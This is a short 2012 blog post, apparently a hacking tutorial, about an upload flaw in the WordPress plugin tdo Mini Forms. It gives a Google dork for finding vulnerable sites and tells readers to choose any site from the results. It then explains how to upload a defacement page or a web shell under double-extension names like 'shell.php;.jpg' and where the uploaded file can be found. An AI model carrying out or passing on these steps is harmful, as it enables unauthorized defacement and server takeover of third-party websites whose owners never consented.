Banner 468 x 60px

LikeViews

Monday, 16 January 2012

WordPress Plugin : tdo Mini File Upload Vulnerability

Comments
WordPress Plugin : tdo Mini  File Upload Vunerablity

Google Dork : 
"inurl:”plugins/tdo-mini-forms/tdomf-upload-inline.php?tdomf_form_id=1"
Go to google.com and enter this dork  
"inurl:”plugins/tdo-mini-forms/tdomf-upload-inline.php?tdomf_form_id=1"

Now see the results and select any site.......

Now upload your deface as deface.html;.jpg and upload your shell as shell.asp;.jpg or shell.php;.jpg

and see your uploaded file here....
www.site.com/wp/wp-content/uploads/tdomf/tmp/1/Yourfilehere
 
Convex Coders © 2011 Convex-Coders. Supported by Code 104 and tech PANELS